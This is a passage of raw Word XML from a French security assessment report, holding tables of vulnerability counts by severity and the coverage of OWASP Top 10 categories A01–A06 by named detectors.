        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="393DEEBA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>62</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17FC3388" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>4.0–6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4151B9B4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>XSS×N(A03), IDOR×N(A01), Misconfig×N(A05), Components×N(A06)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="774E0B4C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&lt; 30j</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="164A0401" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="127887CB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="008C3C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="34FE34F0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="1741ABE3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>0.1–3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4D6BEEFE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="40BC63B6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>&lt; 90j</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="7FC3D8FB" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30884765" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7727CDE5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>70</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D12D316" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4252" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6638C76F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>9/10 catégories OWASP couverts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B47E25D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1768152A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="006A6D93"/>
    <w:p w14:paraId="0F00A907" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.6.2  Couverture OWASP Top 10 Détaillée</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276130EF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tableau — Couverture détaillée par catégorie OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="806"/>
        <w:gridCol w:w="2300"/>
        <w:gridCol w:w="2855"/>
        <w:gridCol w:w="1583"/>
        <w:gridCol w:w="1794"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="1BE00E4C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="569F0DED" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EE6136B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Catégorie OWASP 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B83ACF0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Détecteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="158E4E74" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F6474C3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Statut</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="0373CC65" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D912896" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44CEFE6C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54035FDB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IDORDetector + PathTraversalDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2081409C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IDOR×N + PathTrav×1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1998514E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="008C3C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Couvert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="685C6D34" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="0C74F4DE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7DE2A8A2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7B6C53B2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CryptographicFailuresDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="05D3D5D2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="2ABE7A09" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="008C3C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Couvert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="21B356B6" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CD65E19" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06E4C8BE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11F5C478" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SQLiDetector + XSSDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C7EDFDA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1 SQLi + 62 XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A5E60C6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="008C3C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Couvert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="5F5C9354" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7812423B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6F83C186" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="2CA427B1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>FileUploadDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="30938E70" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="27CC3010" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="008C3C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Couvert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="67037572" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D8CDC39" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE96754" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Security Misconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="582DB54A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SecurityMisconfigDetector + XXEDetector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C90C56D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>1 XXE + N Misconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08F2D5DF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="008C3C"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Couvert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="7DD476C0" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="0ABD816A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="231A81AC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulnerable Components</w:t>
            </w:r>
